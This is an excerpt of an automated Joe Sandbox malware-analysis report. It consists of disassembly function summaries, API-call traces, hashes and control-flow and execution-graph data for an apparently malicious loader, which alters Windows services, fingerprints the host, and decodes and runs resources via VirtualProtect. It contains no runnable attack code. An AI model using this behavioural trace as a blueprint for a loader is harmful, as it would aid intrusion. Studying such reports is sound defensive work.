                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F0BF88
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00F09E02,00F0CD80,00000030,00F0448F,?,?,?,00000001), ref: 00F0C008
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcessmemcpywcschr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 3241892172-381716982
• Opcode ID: 343022eb745bab619cb8e5ece88a4a2e5ecc7926e5c456e784e3e9853d8973d6
• Instruction ID: 67a7e87b2f203f3d438d48d5f1e9d978113fc4b1cbab8034af757495c12b6dc4
• Opcode Fuzzy Hash: 343022eb745bab619cb8e5ece88a4a2e5ecc7926e5c456e784e3e9853d8973d6
• Instruction Fuzzy Hash: D9614F71E04219CBCF14CFA8D8906ADB7F1EB48314B25812EE816E72D0DB759941FF94
APIs
• _wcsicmp.MSVCRT ref: 00EEABE3
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
  • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
  • Part of subcall function 00EECF10: _setjmp3.MSVCRT ref: 00EECF28
  • Part of subcall function 00EECF10: iswspace.MSVCRT ref: 00EECF6B
  • Part of subcall function 00EECF10: wcschr.MSVCRT ref: 00EECF8D
  • Part of subcall function 00EECF10: iswdigit.MSVCRT ref: 00EECFEE
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
• longjmp.MSVCRT(00F20A30,00000001,00000000,00000000,00000002), ref: 00EFCB58
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
• String ID: REM/?
• API String ID: 49548326-4093888634
• Opcode ID: 6e98209be7a74e30b1a376bcb02e1989b8cab72d6d714d5943ca444cc8fda7e4
• Instruction ID: 6e35d0e65771dc05d3a855cfec0f71dac279aa7db753e5e7c1b3b3db7495dbe9
• Opcode Fuzzy Hash: 6e98209be7a74e30b1a376bcb02e1989b8cab72d6d714d5943ca444cc8fda7e4
• Instruction Fuzzy Hash: 8F31E73171034D57D724DF76AC42A6AB3E6EF40314F35683EE102EB191DAB5EC019756
APIs
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00EEB11F), ref: 00EFCB8B
• SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 00EFCC2D
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ConsoleTitle
• String ID: -
• API String ID: 3358957663-3695764949
• Opcode ID: ac7131a0687311bd9cbf461c246c88a6d6782acd49e05ca4ff4a111949786033
• Instruction ID: 3031a2f222faf41f3b5b694be6bfe49407d190c5ca81dcbc4987431b00a56bf7
• Opcode Fuzzy Hash: ac7131a0687311bd9cbf461c246c88a6d6782acd49e05ca4ff4a111949786033
• Instruction Fuzzy Hash: EB21293160014C9BCB15A72DDC957BE77A1DBC0308F3A612CE902BB294DE749D42D782
APIs
• _get_osfhandle.MSVCRT ref: 00F097DA
• SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F00138,?,00000021,00000021,?,?,?,?,00000001,?,00000200,?,L#,?,00000000), ref: 00F097E2
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: FileTime_get_osfhandle
• String ID: L#
• API String ID: 1911523439-2643830878
• Opcode ID: 877da9ad09423f17f1f550b022ffa90c73244335f8209730d49761f90a43872c
• Instruction ID: 0757c2f9adb42b23b42a08d96e9ba81d64ff1a2d4aa88a65d74c33a3d9058ccb
• Opcode Fuzzy Hash: 877da9ad09423f17f1f550b022ffa90c73244335f8209730d49761f90a43872c
• Instruction Fuzzy Hash: FC11DA72614148ABD728EF25DC46C6F77A5EBC5320B20C52DF512D71D2EEB59D01B620
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F08AC9
• printf.MSVCRT ref: 00F08B24
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                                                                                                                                                                                                                                                                                                      • String ID: %3d
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2845598586-2138283368
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 70aaec13b4a001711dfb6d13c76d460c7d86b7c4fc164eac7ddbd7a203961ee9
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cc2bbcff562040493ea4593a527321a6d110bcb7e8d70d777b51a5db4c1365da
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70aaec13b4a001711dfb6d13c76d460c7d86b7c4fc164eac7ddbd7a203961ee9
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E80149B16002087BE7216AA69C87FEB3ADDDB84BE0F044015FB09B50C1E6B59C51E271
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1D90: _wcsnicmp.MSVCRT ref: 00EF1E14
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00EE8E86,00EE8E5A,00000000), ref: 00EEDC98
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDC60: RtlFreeHeap.NTDLL ref: 00EEDC9F
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF2286
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocFree_wcsnicmpwcstol
                                                                                                                                                                                                                                                                                                                                                      • String ID: F1$/
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2867344635-3908456548
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d8230efbcc8e962820716ae787ff78e996f3f15982a8d8b078ad4e5c3d83af58
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f9fa2d69472e073b94ec2cfe1fd379704155490a3746df560692780a4be8dce0
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8230efbcc8e962820716ae787ff78e996f3f15982a8d8b078ad4e5c3d83af58
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0283260421D67D72466689C45ABFB3DE8BC0754F181929FB06B7190FF91DD01D2A1
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: =,;
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 287713880-1539845467
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: fe130c715e636816308f4145d90ca53ded7074990cf1de1531053511a189b065
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ed899d5d52efa9bba07a21af464384e73c4567e04f24096a039b0ef9359d5c7c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe130c715e636816308f4145d90ca53ded7074990cf1de1531053511a189b065
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE0DF336041EA9B46300A0FBC188B7B2DB9F97B6431E243FF800B6110F7616C019193

                                                                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                                                                      Execution Coverage:14.6%
                                                                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                      Total number of Nodes:32
                                                                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:2

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1611591150-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 27ee011044e7d5e793fd8ebd023162aebb77fc20787e11e0718a971f15838409
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A1121F5E00104BBCB00EBACEC85F5B77ACA798304F104479F909E73A1E979EA489765

Memory Dump Source
• Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
Similarity
• API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
• String ID: %s\%s
• API String ID: 2742963760-4073750446
• Opcode ID: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
• Instruction ID: ce340559ed643e80c0758f702ca7b046c498c1d309c8b568501c00ab43499a41
• Opcode Fuzzy Hash: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
• Instruction Fuzzy Hash: FE7125F1E001049BDB54DB5CDC81BDE77B9EB44309F04417AF60AFB391E639AA848B59

Memory Dump Source
• Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
Similarity
• API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
• String ID:
• API String ID: 2992075992-0
• Opcode ID: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
• Instruction ID: 3ba0f7a8f6b0ede00da755a29cfea894b35039c78ebbae5d4c541c040a1a5c4d
• Opcode Fuzzy Hash: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
• Instruction Fuzzy Hash: 184155F0E001049BDF58DB58DC91B9E77B9DB44309F0441B9F60AFB391E538AA88CB59

Control-flow Graph (graph image not preserved; basic blocks and edges recovered from the graph data)
• Block 25: 401000-40102e, calls malloc; -> 26
• Block 26: 401031-401039; -> 27, -> 28
• Block 27: 401087-40108b
• Block 28: 40103f-401085; -> 26
Strings
• 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9, xrefs: 0040106E
Memory Dump Source
• Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
Similarity
• API ID: malloc
• String ID: 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9
• API String ID: 2803490479-4106697161
• Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
• Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
• Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
• Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Control-flow Graph (graph image not preserved; basic block recovered from the graph data)
• Block 31: 4013ff-401452, calls 401358, 40108c, 4013b4
Memory Dump Source
• Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
Similarity
• API ID: memset$EntryPointfopenstrcmpstrcpy
• String ID: D`4wD`4w$D`4wD`4w
• API String ID: 4108700736-3394693991
• Opcode ID: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
• Instruction ID: e83efdde7d34d28be519ed2e6888d9f42519b086e2d7e65c64a29ab7e0d92d08
• Opcode Fuzzy Hash: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
• Instruction Fuzzy Hash: 99F0F8B4E00209EFCB40EFADE981D8A77F8AB48304F104075F908D7751EA34EA488B64

Execution Graph

Execution Coverage:8.4%
Dynamic/Decrypted Code Coverage:46.6%
Signature Coverage:28.6%
Total number of Nodes:294
Total number of Limit Nodes:30

Graph image not preserved. API-resolving nodes recovered from the graph data, grouped by entry node (full edge list omitted; the node listing on the page is truncated after 40cc58):
• 6c520c -> 6ecbd0 -> 6ebe50 (_wcslen): StrStrIW at 6ebf68, 6ebffd, 6ec399, 6ec706, 6ec72b; OpenServiceW at 6ec36b; ChangeServiceConfigW at 6ec65a; StartServiceW at 6ec7e4; CloseServiceHandle at 6ea350, 6ec0fd, 6ec78e; LocalFree at 6ea905 (via 6ec168); also reaches 6cce90 and 6c5d20
• 6cce90 -> 6ccc9b (_wcslen): lstrcmpiW at 6ccca0, 6ccd5c; GetFileTime at 6ccfbb; SetFilePointerEx at 6cd049; CreateFileW at 6cd5c5; GetFileSizeEx at 6cd729; CloseHandle at 6cd378, 6cd42a, 6cd8a1; VirtualAlloc/VirtualFree at 6c5d20, 6c8470, 6c8937; 6cd903 -> 6ffdfc (40 API calls)
• 6c5d20 -> 6c5d22: VirtualAlloc at 6c5d39; VirtualFree at 6c5d46
• 2ac9308: CloseHandle at 2ac9348 -> 2ac9379
• 6c5085 -> 6c506f -> 6e8550 -> 6e8556: GetLastError at 6e7fd4, 6e8145, 6e824a, 6e836e, 6e8bc1; GetUserNameW at 6e8209, 6e83fb; GetVolumeInformationW at 6e7d6c, 6e7f6b; GetWindowsDirectoryW at 6e7d83; GetComputerNameW at 6e7e06; wsprintfW at 6e896a; AllocateAndInitializeSid at 6e8953; SetEntriesInAclW at 6e8986; LocalFree at 6e890b; OpenMutexW at 6e89cd
• 5abfda0 -> 5abfdd8 -> 5abfe0d -> 5abe11c: GlobalMemoryStatusEx at 5abfeb0
• 6cb180 -> 6cb0de: SetFilePointerEx at 6cb0d0, 6cb2a7, 6cb328; WriteFile at 6cb2e0
• 2ac0890 -> 2ac08b1 -> 2ac3d8a / 2ac4acf -> 2ac9080 -> 2ac9093 -> 2ac9130: VirtualProtect at 2ac9080 and 2ac9178
• 6caaf0 -> 6cab06 -> 6c6490 -> 6c5f10: SetFilePointerEx at 6c6084; 6c5d90 -> 6ffaf0: 700fe0 and 700ff7 (21 API calls, __startOneArgErrorHandling), 701a1b (21 API calls, 2 library calls)
• 40cbdd -> 40cbe9: HeapCreate at 40d534; 40cc46 -> 41087e (71 API calls, 8 library calls) -> 40cc4c -> 40cc50; 40cc58 (listing truncated)
GlobalMemoryStatusEx 41779->41780 41782 5abfe2a 41780->41782 41782->41772 41783 6cb180 41792 6cb0de 41783->41792 41784 6cb2a7 SetFilePointerEx 41786 6cb1df 41784->41786 41788 6cb1c6 41784->41788 41785 6cb196 41787 6cb3a6 41785->41787 41785->41788 41789 6cb328 SetFilePointerEx 41787->41789 41790 6cb3b2 41787->41790 41788->41786 41791 6cb2e0 WriteFile 41788->41791 41792->41783 41792->41784 41792->41785 41792->41789 41793 6cb0d0 SetFilePointerEx 41792->41793 41794 6cb253 41792->41794 41793->41792 41795 6cb054 41793->41795 41801 2ac0890 41802 2ac08b1 41801->41802 41803 2ac097a 41802->41803 41806 2ac4acf 41802->41806 41809 2ac3d8a 41802->41809 41812 2ac9080 41806->41812 41811 2ac9080 VirtualProtect 41809->41811 41810 2ac3da6 41811->41810 41814 2ac9093 41812->41814 41816 2ac9130 41814->41816 41817 2ac9178 VirtualProtect 41816->41817 41819 2ac4af1 41817->41819 41820 6caaf0 41821 6cab06 41820->41821 41825 6cab57 41821->41825 41826 6c6490 41821->41826 41827 6c5f10 41826->41827 41829 6c5d90 41826->41829 41828 6c6084 SetFilePointerEx 41827->41828 41827->41829 41828->41827 41830 6ffaf0 41829->41830 41831 6ffafd 41830->41831 41832 6ffb84 41830->41832 41831->41832 41833 6ffb2a 41831->41833 41837 6ffc05 41832->41837 41840 6ffbda 41832->41840 41836 70032f 41833->41836 41849 701a1b 21 API calls 2 library calls 41833->41849 41835 7008d6 41835->41825 41836->41825 41841 6ffc38 41837->41841 41848 700fe0 21 API calls __startOneArgErrorHandling 41837->41848 41839 6ffc22 41839->41825 41840->41841 41842 701167 41840->41842 41843 70116e 41840->41843 41841->41825 41850 700ff7 21 API calls __startOneArgErrorHandling 41842->41850 41851 700fe0 21 API calls __startOneArgErrorHandling 41843->41851 41846 70116c 41846->41825 41847 701173 41847->41825 41848->41839 41849->41835 41850->41846 41851->41847 41852 40cbdd 41853 40cbe9 41852->41853 41896 40d534 HeapCreate 41853->41896 41856 40cc46 41957 41087e 71 API calls 8 library calls 41856->41957 41859 40cc4c 41860 40cc50 41859->41860 41861 40cc58 
__RTC_Initialize 41859->41861 41958 40cbb4 62 API calls 3 library calls 41860->41958 41898 411a15 67 API calls 2 library calls 41861->41898 41863 40cc57 41863->41861 41865 40cc66 41866 40cc72 GetCommandLineA 41865->41866 41867 40cc6a 41865->41867 41899 412892 71 API calls 3 library calls 41866->41899 41959 40e79a 62 API calls 3 library calls 41867->41959 41870 40cc71 41870->41866 41871 40cc82 41960 4127d7 82 API calls 3 library calls 41871->41960 41873 40cc8c 41874 40cc90 41873->41874 41875 40cc98 41873->41875 41961 40e79a 62 API calls 3 library calls 41874->41961 41900 41255f 81 API calls 6 library calls 41875->41900 41878 40cc97 41878->41875 41879 40cc9d 41880 40cca1 41879->41880 41881 40cca9 41879->41881 41962 40e79a 62 API calls 3 library calls 41880->41962 41901 40e859 73 API calls 5 library calls 41881->41901 41884 40cca8 41884->41881 41885 40ccb0 41886 40ccb5 41885->41886 41887 40ccbc 41885->41887 41963 40e79a 62 API calls 3 library calls 41886->41963 41902 4019f0 OleInitialize 41887->41902 41890 40ccd8 41892 40ccea 41890->41892 41964 40ea0a 62 API calls _doexit 41890->41964 41891 40ccbb 41891->41887 41965 40ea36 62 API calls _doexit 41892->41965 41895 40ccef __getstream 41897 40cc3a 41896->41897 41897->41856 41956 40cbb4 62 API calls 3 library calls 41897->41956 41898->41865 41899->41871 41900->41879 41901->41885 41903 401ab9 41902->41903 41966 40b99e 41903->41966 41905 401abf 41906 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 41905->41906 41933 402467 41905->41933 41907 401dc3 CloseHandle GetModuleHandleA 41906->41907 41915 401c55 41906->41915 41979 401650 41907->41979 41909 401e8b FindResourceA LoadResource LockResource SizeofResource 41981 40b84d 41909->41981 41913 401c9c CloseHandle 41913->41890 41914 401ecb _memset 41916 401efc SizeofResource 41914->41916 41915->41913 41919 401cf9 Module32Next 41915->41919 41917 401f1c 41916->41917 41918 401f5f 41916->41918 41917->41918 42037 401560 __VEC_memcpy __cftoe2_l 41917->42037 41921 401f92 
_memset 41918->41921 42038 401560 __VEC_memcpy __cftoe2_l 41918->42038 41919->41907 41927 401d0f 41919->41927 41923 401fa2 FreeResource 41921->41923 41924 40b84d _malloc 62 API calls 41923->41924 41925 401fbb SizeofResource 41924->41925 41926 401fe5 _memset 41925->41926 41928 4020aa LoadLibraryA 41926->41928 41927->41913 41931 401dad Module32Next 41927->41931 41929 401650 41928->41929 41930 40216c GetProcAddress 41929->41930 41932 4021aa 41930->41932 41930->41933 41931->41907 41931->41927 41932->41933 42011 4018f0 41932->42011 41933->41890 41935 40243f 41935->41933 42039 40b6b5 62 API calls 2 library calls 41935->42039 41937 4021f1 41937->41935 42023 401870 41937->42023 41939 402269 VariantInit 41940 401870 75 API calls 41939->41940 41941 40228b VariantInit 41940->41941 41942 4022a7 41941->41942 41943 4022d9 SafeArrayCreate SafeArrayAccessData 41942->41943 42028 40b350 41943->42028 41946 40232c 41947 402354 SafeArrayDestroy 41946->41947 41955 40235b 41946->41955 41947->41955 41948 402392 SafeArrayCreateVector 41949 4023a4 41948->41949 41950 4023bc VariantClear VariantClear 41949->41950 42030 4019a0 41950->42030 41953 40242e 41954 4019a0 65 API calls 41953->41954 41954->41935 41955->41948 41956->41856 41957->41859 41958->41863 41959->41870 41960->41873 41961->41878 41962->41884 41963->41891 41964->41892 41965->41895 41969 40b9aa _strnlen __getstream 41966->41969 41967 40b9b8 42040 40bfc1 62 API calls __getptd_noexit 41967->42040 41969->41967 41971 40b9ec 41969->41971 41970 40b9bd 42041 40e744 6 API calls 2 library calls 41970->42041 42042 40d6e0 62 API calls 2 library calls 41971->42042 41974 40b9f3 42043 40b917 103 API calls 3 library calls 41974->42043 41976 40b9ff 42044 40ba18 LeaveCriticalSection _doexit 41976->42044 41977 40b9cd __getstream 41977->41905 41980 4017cc ___crtGetEnvironmentStringsA 41979->41980 41980->41909 41982 40b900 41981->41982 41993 40b85f 41981->41993 42052 40d2e3 6 API calls __decode_pointer 41982->42052 41984 40b906 42053 40bfc1 62 API 
